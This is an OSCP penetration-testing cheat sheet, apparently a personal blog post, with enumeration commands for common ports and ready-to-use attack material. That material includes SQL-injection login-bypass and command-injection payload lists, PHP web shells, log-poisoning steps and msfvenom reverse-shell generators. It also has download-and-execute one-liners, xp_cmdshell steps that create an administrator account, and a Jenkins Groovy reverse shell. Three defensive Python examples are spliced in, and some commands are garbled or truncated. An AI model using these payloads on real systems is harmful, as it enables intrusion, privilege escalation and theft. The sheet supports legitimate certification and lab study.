Penetration Testing Cheat Sheet

While studying for the OSCP from various sources, I took notes and made a quick cheat sheet so that I don't need to search for the same thing repeatedly. I am sharing this cheat sheet as I think it might be helpful for someone.

Note: If you need more help or have questions, mail me, or follow me on Twitter:

Enumeration is the key to OSCP

Enumeration is the most important part. All findings should be noted for future reference. Without enumeration, we will have a hard time exploiting the target.

Basic Enumeration

Whenever I start pen-testing an IP address, my first tool is Nmap. While Nmap keeps scanning, I use a browser such as Firefox to try connecting to some common ports.

Port Scanning & Service Identification

#Scan for all TCP ports
$ nmap -vvv -Pn -p- -oN allports $target
#Quick scan of the top UDP ports
$ nmap -sU -v -oN udpPorts $target

Filter all open ports for Nmap script scanning:

$ grep '/tcp' allports | awk -F "/" '{print $1}'| tr '\n' ',';echo
#copy and paste the ports list to nmap '-p' and scan
$ nmap -sC -sV -p 1,2,3,4 -oN scriptscan $target
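As an added example (not from the original cheat sheet), a small Python parser that does what the grep/awk/tr pipeline above does against `-oN` output, but keeps only ports whose state is `open`, so filtered ports do not end up in the script scan. The scan output it reads is constructed.

```python
import re

# Constructed sample of `nmap -vvv -Pn -p- -oN allports $target` output (not real scan data).
SAMPLE_ALLPORTS = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -vvv -Pn -p- -oN allports 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.021s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      REASON
21/tcp    open     ftp          syn-ack
22/tcp    open     ssh          syn-ack
80/tcp    open     http         syn-ack
445/tcp   open     microsoft-ds syn-ack
8080/tcp  filtered http-proxy   no-response
# Nmap done at Mon Jan  1 12:00:40 2024 -- 1 IP address (1 host up) scanned in 40.12 seconds
"""

# One port line of normal (-oN) output: "<port>/<proto>  <state>  <service>  <reason>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)


def parse_ports(text, proto="tcp", state="open"):
    """Return (port, service) pairs whose protocol and state match.

    `grep '/tcp'` alone would also pull in filtered ports; matching on the
    STATE column avoids wasting the script scan on them.
    """
    found = []
    for m in PORT_LINE.finditer(text):
        port, p, st, svc = m.groups()
        if p == proto and st == state:
            found.append((int(port), svc))
    return found


def ports_arg(text, proto="tcp"):
    """Comma-separated open ports, ready to paste after `nmap -p`."""
    return ",".join(str(p) for p, _ in parse_ports(text, proto))


if __name__ == "__main__":
    ports = ports_arg(SAMPLE_ALLPORTS)
    print("nmap -sC -sV -p " + ports + " -oN scriptscan $target")
```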

Automated Enumeration Script


./ $target_ip All

Other Interesting tools

binwalk <image>
strings -n 8 <image/file>
steghide info <image>
strace <file>
ltrace <file>
file <file>
ls -la <file>

Pentesting Specific Services

If we have found some ports open, we can use the below methods to enumerate them!

Port 21(FTP)

Scan FTP with Nmap

nmap -vvv -sC -p21 $target

Login and Upload backdoor

ftp $target
ftp> user anonymous            # enter any e-mail-style string at the password prompt
ftp> binary
ftp> put path/file_name.ext    # "upload" is not an ftp client command; put sends the file

Port 22(SSH)

Banner Grab

ssh root@target

Quick Brute Forces

hydra -l root -P wordlist ssh://target_ip

Port 25(SMTP)

Username enumeration (useful for brute forcing):

$ nc $target 25
VRFY username

Port 53(DNS)

Forward Lookup:

# $domain is the target domain (set it first); try each name from the wordlist
for dns in $(cat namelist.txt); do host "$dns.$domain"; done | grep "has address"

Reverse Lookup:

# $ip is the /24 prefix (e.g. 10.10.10); try the last octets 164-167
for adr in $(seq 164 167); do host "$ip.$adr"; done | grep "pointer"

Test for a Zone transfer from your Kali machine

# list the name servers of the domain; each output line reads "<domain> name server <ns>"
$ host -t ns $domain

#Zone Transfer against one of those name servers. If enabled, it should list every record!
$ host -l $domain $nameserver
Using domain server:

; Transfer failed.

$ dnsrecon -d $domain -t axfr #Zone Transfer
dnsenum -f namelist.txt $domain #brute force domain names


Enumerate using nslookup,dig, and gobuster:

$ nslookup
>server $target_ip
>$target_ip        name = ns1.cronos.htb.

$ dig axfr cronos.htb @$target_ip
$ gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt

Other tools to try:

host -l $domain name_server #Zone Transfer
dnsrecon -d $domain -t axfr #Zone Transfer
dnsrecon -d $domain -D ~/words.txt -t brt #brute force subdomains
dnsenum $domain #Zone transfer

Port 79(Finger)

If the finger service is running, it is possible to enumerate usernames.

nmap -vvv -Pn -sC -sV -p79 $target

Port 80/443(HTTP/HTTPS)

What to check?

  1. Manually browse the links.
  2. Identify the technology in use, then search for known vulnerabilities in it.
  3. Gather information from the SSL certificate.
  4. Check for proxy-related vulnerabilities.
  5. Brute force directories and sensitive files.
  6. Check for hidden parameters.
  7. Find all input points.
  8. Find subdomains.

View HTML sources, and also Browse Manually


Identify Technology using whatWeb

whatweb -a 3 $target

Scan using Nikto

nikto -h $target

If any CMS identified

wpscan --url http://$target -e p,t,u --detection-mode aggressive > wpscan.log #For wordpress scanning
wpscan --url http://$target -e vp --plugins-detection aggressive --api-token API_KEY #Scan for vulnerable plugins with API
droopescan scan drupal http://$target -t 32 # if drupal found
joomscan --ec -u $target #if joomla found

Brute Force Directory and Files

  1. First, use a small common wordlist
  2. Then Big Word list
  3. Try with CMS-related wordlist

Word list File in Kali Linux:


Brute force directory and files using Gobuster:

#scan only for directory
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt 

#Scan for directory, and files extension of php,txt or conf
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf

#ignore Certificate check  
gobuster dir -u https://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k 

Password brute Forcing(wordpress example) using Hydra:

hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

If a URL parameter takes a file name, we can test it for LFI/RFI.
Request an invalid file and see whether an error is displayed!

#target url
# Any error displayed? Requesting an invalid file may leak the script path, like: Warning: include(files/ninevehNotes):
failed to open stream: No such file or directory in /var/www/html/direcotry/note.php on line 21



#May need to try different ways to find the exploit:

#Remote File Inclusion!
LFI can execute code through log poisoning!
#Find or guess where the log files are, such as:

Modify the User-Agent header and send the request using curl, Burp Suite or even netcat:

User-Agent: bytefellow: <?php system($_GET['cmd']); ?>

Now execute the command:
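From the defender's side, an added example (not part of the original page): a log-review script that flags the two artefacts this technique leaves in a web server's access log, traversal-style `file=` values and PHP tags in the User-Agent. The combined-format log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /note.php?file=files/ninevehNotes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /note.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 120 "-" "bytefellow: <?php system($_GET['cmd']); ?>"
10.0.0.8 - - [01/Jan/2024:12:00:04 +0000] "GET /note.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1200 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)          # poisoned header/parameter
TRAVERSAL = re.compile(r"(\.\./|/etc/passwd|/var/log/|/proc/self/)", re.IGNORECASE)


def classify(line):
    """Return the finding tags for one log line (empty list if clean or unparsable)."""
    m = LINE.match(line)
    if not m:
        return []
    tags = []
    path = unquote(m["path"])  # decode %2F etc. so URL-encoded traversal is still seen
    if TRAVERSAL.search(path):
        tags.append("lfi-probe")
    if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["ref"]) or PHP_TAG.search(path):
        tags.append("log-poisoning")
    return tags


def scan(text):
    """Map each source IP to the sorted list of tags seen across all its requests."""
    out = {}
    for line in text.splitlines():
        for tag in classify(line):
            out.setdefault(line.split(" ", 1)[0], set()).add(tag)
    return {ip: sorted(tags) for ip, tags in out.items()}


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

A source that shows both tags has staged a poisoned log line and then included it, which is the full chain described above; either tag alone is still worth an alert.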

Command Execution

If we find any parameters or input fields, we can test them for command execution.
Test every parameter and input field with these payloads (better to use Burp Suite Intruder):

#For Linux
;netstat -a;
#For Windows
| dir
; dir
& dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings*
; dir C:\Documents and Settings*
& dir C:\Documents and Settings*
&& dir C:\Documents and Settings*
dir C:\Documents and Settings*
| dir C:\Users
; dir C:\Users

Reference and more payload:

SQLi for Login Bypass

If a login page is found, we should try to bypass the password check.
These payloads were copied from:

' '
'' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or '''
" "
"" " or ""-" " or "" " " or ""&" " or ""^" " or """
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
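As an added example, not from the original page: the query shape these payloads target, built by string concatenation, next to the parameterised form that defeats them, run against a constructed in-memory SQLite table (SQLite treats `--` as a comment but not `#`, so only the `--` variants apply here).

```python
import sqlite3

# Constructed demo table (not from the original page). Plaintext storage is kept only
# so the injected strings are easy to follow; real applications store password hashes.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", "S3cret!"))
    return db


def login_vulnerable(db, username, password):
    """Query built by string concatenation: the shape the bypass payloads above target."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a payload that breaks the syntax just errors out


def login_safe(db, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


# (username, password) pairs; the payload strings are the ones listed above
CASES = {
    "valid": ("admin", "S3cret!"),
    "wrong-password": ("admin", "guess"),
    "comment-out": ("admin' --", "anything"),
    "tautology": ("x", "' or '1'='1"),
    # the ') variants only fit a query that wraps the value in parentheses; here they just error
    "paren-tautology": ("admin') or ('1'='1", "anything"),
}


def accepted_by(login):
    """Names of the cases a login function lets through, sorted for stable comparison."""
    return sorted(name for name, (u, p) in CASES.items() if login(make_db(), u, p))


if __name__ == "__main__":
    print("vulnerable:", accepted_by(login_vulnerable))
    print("safe:      ", accepted_by(login_safe))
```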

Useful Cheat Sheet:

Exploiting WebDav

If one method fails, another should be tested. If nothing works, Find a different exploit!

Method 1:

davtest -url http://$target/webdav
cadaver http://$target/webdav
> put test.php

Method 2:

cp /usr/share/webshells/php/simple-backdoor.php bytef.php
curl -T 'bytef.php' 'http://ip/webdav/'

Method 3:

nmap -p 80 $ip_address --script http-put --script-args http-put.url='/webdav/bytef.php',http-put.file='backdoor/bytef.php'


  1. File Inclusion
  2. SQL Injection
  3. Command Injection

Port 110(POP3)

Found a user login information?

$ nc -vvv $target 110
USER test
PASS test

#list all mails
list

#Retrieve a mail
retr mail_number

Port 111 (RPCINFO)

Connect with Null session.

nmap -v -p 111 --script=nfs* $ip
rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID

Port 137,138,139

nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137,138,139 -Pn -n <IP>

Port 445(SMB)

There is a big chance of getting sensitive information with SMB!

Enumerating SMB

nmap -v -p 139,445 --script=smb-os-discovery,smb-ls,smb-enum-users,smb-enum-shares,smb-enum-sessions,smb-system-info $ip

#Scan for Vulnerability
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe=1 $ip

#Other tools
enum4linux -a $target
smbmap -H $target
smbclient -N -L //$target
smbclient -U username -L //$ip

Connecting to share without a password(Anonymous login)

smbclient -N //$ip/share
>recurse on
>prompt off
>cd directory
>mget directory

Login with Password

smbclient -U username //$ip/share

Port 389(LDAP)

ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons

Port 1433(MSSQL)


nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

brute force for the “SA” password

hydra -l sa -P password.txt -V $ip mssql

Connect to MSSQL Server:

sqsh -S server_address -U sa -P password

Enable xp_cmdshell:

exec sp_configure 'show advanced options', 1; reconfigure
go
exec sp_configure 'xp_cmdshell', 1; reconfigure
go

Execute System Command:

xp_cmdshell 'net user byte bytepass /add'
xp_cmdshell 'net localgroup Administrators byte /add'
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

Port 2049(NFS)

Enumerate shares

nmap -v -p 2049 --script=nfs* $ip
showmount -e $ip
showmount -a $ip

Mount shares in Kali Machine

mount -t nfs -o vers=2,nolock target_ip:/home local_folder/

After mounting the filesystem, if we don't have read/write permission on its files, we create a local user and edit /etc/passwd so that its UID matches the owner UID of the files on the share (NFS trusts the UID the client presents):

root@kali:/home/bytef//nfs# adduser pwn
Adding user `pwn' ...
Adding new group `marcus' (1001) ...
Adding new user `marcus' (1001) with group `marcus' ...
Creating home directory `/home/pwn' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default 
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
root@kali:/home/bytef/nfs# nano /etc/passwd
root@kali:/home/bytef/nfs# su pwn

Now we can write files to the target folder of the network filesystem. For example:

pwn@kali:/home/bytef/nfs/pwn$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pwn/.ssh/id_rsa): /home/bytef/pwn/.ssh
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/bytef/nfs/pwn/.ssh
Your public key has been saved in /home/bytef/nfs/pwn/
The key fingerprint is:
SHA256:/PH2zrnWxuuT18DFMZvN7WGS7ltUKdz4N+iYjTEZYiQ4 pwn@kali
The key's randomart image is:
+---[RSA 3072]----+
|         . .     |
|      E . o      |
|       o o       |
|       .o .     o|
|        S..    *o|
|         .oo. oo%|
|         +. o+ &X|
|          o.+o=O@|
|           . BX*B|

Port 3306(MYSQL)

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-variables,mysql-vuln-cve2012-2122 <IP>

Port 3389(RDP)

Connect to RDP

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP

Quick Brute force if a valid username is found:

hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp

Add user to RDP Group

net localgroup "Remote Desktop Users" username /add

Port 5900/5800(VNC)

Scan with Nmap

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 $ip

Connect using vncviewer from Kali

vncviewer [-passwd passwd.txt] <IP>::5901

Password Attack

Sometimes we need to do password guessing (and we should!). For a better success rate we need a good password dictionary.
Also, we should search online for default credentials!

I have collected some usernames and passwords for quick brute forcing, usually used in CTFs.
These lists can be used to exploit weak passwords. They are uploaded to GitHub:

Common Username
Common Password

Common password


Generate Password using cewl

cewl -m 2 -d 5 -a -w pass1.txt http://$ip_address/dir/index.php

Brute Force using Burp

If it is a web form, we can brute force it in Intruder and use grep match. Some screenshots from Burp Suite:

To brute force a web form with Hydra, we need to grab the POST data from Burp Suite carefully.
Otherwise, we will get false positives and waste lots of time! I tried to brute force OTRS and it worked.

Brute Force using Hydra

hydra -l root@localhost -V -P pass1.txt $target http-form-post "/^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly.:H=Cookie: OTRSBrowserHasCookie=1"
hydra -l root@localhost -V -P pass1.txt $target http-form-post "/^USER^&Password=^PASS^:F=Login failed!"

Vulnerability and Exploitation

We have enumerated our target. Now Find vulnerabilities!

Find Vulnerability using Nmap

nmap -Pn -p 80,139,445,21 --script vuln $target

Using Searchsploit

#update database
searchsploit -u
#Searching variation
searchsploit afd windows local
searchsploit kernel 2.6
searchsploit oracle windows

#this will copy the exploit to current directory
searchsploit -m exploit_id 

Find Exploits using Google

Three kinds of search should be enough to find a working exploit

service_version Exploit
site: service_version exploit
site: service_version exploit

Working with Public Exploits

A public exploit might be coded in Python, Ruby, C/C++, or any other language. Before executing the exploit:

  • Read the instructions carefully.
  • Edit the target address, reverse connection IP, and ports.

Working with Shell

We have exploited the vulnerability and got the shell. Now what? Upgrade shell? Privilege escalation? Fix the shell issue?

Backdoor Files in Kali

Kali already has some web shells.


Quick Shells in Different Languages

Here it is:

<?php system("whoami"); ?>
<?php system($_GET['cmd']); ?>
<?php echo exec("whoami");?>

Generate using msfvenom

#Staged windows Payload
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

#Stageless Windows payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe

#Linux Stageless Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Linux Staged Payload
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Other Platform
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > reverse.jsp
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp

#Generate powershell payload
msfvenom -p windows/x64/powershell_reverse_tcp -o psh.ps1 -a x64 --platform windows LHOST=<IP> LPORT=8080

#Generate Shellcode (pick an output format with -f, e.g. c, python or raw)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f <FORMAT>
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f <FORMAT>

Upgrading Shell

Listening for Connection

nc -lvp 1337

Upgrade your unstable shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

#First run "stty -a" in a normal terminal to get the rows and cols numbers, then run the command below
stty rows 52 cols 195

Running Python 3 HTTP Server

#Python 3
python3 -m http.server
#python 2
python -m SimpleHTTPServer

Uploading Shell/File

After getting the shell, we may need to upload additional files or a stable backdoor.

Start HTTP server in Kali:

python3 -m http.server

If the target OS is Linux:

wget http://host:8000/file.bin -O /dev/shm/filename.bin
curl http://host:8000/file.bin -o /dev/shm/filename.bin

If the target OS is Windows:

#Download and Execute powershell script
powershell.exe -c iex(new-object net.webclient).downloadstring('http://host/script.ps1')

(New-Object Net.WebClient).DownloadFile("http://host/shell.exe","C:\Windows\Temp\shell.exe")
Invoke-WebRequest "http://host/shell.exe" -OutFile "shell.exe"
powershell.exe -c Invoke-WebRequest http://host/shell.exe -OutFile shell.exe

certutil -urlcache -split -f http://host/shell.exe c:\windows\Temp\shell.exe && c:\windows\Temp\shell.exe

#Transfer with SMB Share. Attacker machine SMB server should be running
copy \\host\share\shell.exe C:\path\shell.exe

Transfer file using impacket samba script:

#In kali start SMB Server
python3 byte /home/bytef/files

#on the victim machine view the share name
net view \\kali_ip
net use \\kali_ip\byte

#copy the file from shared folder
copy \\kali_ip\byte\file.ext file.ext

Pivot/Tunnel/Port Forwarding

Port forward is required when we can’t access a specific service or other internal machines from our Kali machine!

Local Port Forwarding

Have SSH access with low privileges, and some ports are open internally? Try local port forwarding.

  1. -L 3306 is the listening port opened on Kali.
  2. $ip:3306 is the destination host and port as reachable from the target.
  3. -R (used below for remote forwarding) does the reverse and opens the port on the remote side.

ssh -L 3306:$ip:3306 user@$target_ip

Remote Port Forwarding

No SSH Access but limited shell? Also, some weird port is open? Upload plink and Try Remote port forward with plink

ssh -R 3306:localhost:3306 root@kali_ip
ssh -R 3306:localhost:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@kali_ip

Connect to the tunneled port:

#Verify with nc
nc -vvv localhost 3306

#If mysql
mysql -u username -p -h 127.0.0.1 -P 3306

Dynamic Port Forwarding(Socks4)

Dynamic Port Forwarding from victim machine(Socks Proxy):

ssh -D 8080 -f -N user@$target_ip

With Dynamic Port Forwarding We can access/browse any ip range of the victim machine.
We just need to configure proxychains.conf as follows:

nano /etc/proxychains.conf
socks4 127.0.0.1 8080

Now we can use any application through proxychains, like:

proxychains firefox
proxychains nmap -sT -Pn -p139,445 $ip

Remote Port Forwarding using Plink. Needed When we don’t have access to a specific port on the target box!

# opens port 445 on Kali and forwards it to port 445 on the target's loopback
plink.exe -ssh -l kali_user -pw kali_password -R $kali_ip:445:127.0.0.1:445 $kali_ip

Common Issue

While playing CTFs I had to fix some problems!

Permission issue for SSH Private Key?

chmod 600 id_rsa

Load key “id_rsa”: invalid format?

Try Removing the blank space. Also, keep the public key in the same directory as the private key.
We may get the warning, but it should work!

Unable to negotiate with x.x.x.x

SSH Error:

Unable to negotiate with x.x.x.x port 22: no matching key exchange method found. 
Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1


ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc [email protected]

Practical Exploitation

Here are some examples of exploitation!

Exploiting NFS and FTP

I have done enumeration with nmapautomator. Found NFS and ProFtpd 1.3.5 is running. But no HTTP. The exploitation step was:

showmount -e 172.31.122
mount -o default nfss/
ls nfss

The network File system is mounted but does not have any contents. The FTP version is vulnerable.
So I had to exploit it manually(

nc -vvv 21
ftp>site cpfr /home/daniel
cat nfss/daniel/.ssh/id_rsa
cat nfss/daniel/.ssh/
ssh -i id_rsa [email protected]

This way, I was able to successfully exploit the system without directly using any tools!

Exploiting Jenkins Server

Was able to log in as user admin and password admin. Then I navigated to Manage Jenkins>>Script Console and pasted this code for reverse connection:

String host="";   // attacker IP (left blank in the original)
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

I clicked run and got shell!

More Example:

Follow Me

Note: If you find this cheat sheet helpful, please share it everywhere! And if you want to connect with me, follow my Facebook page and put a review: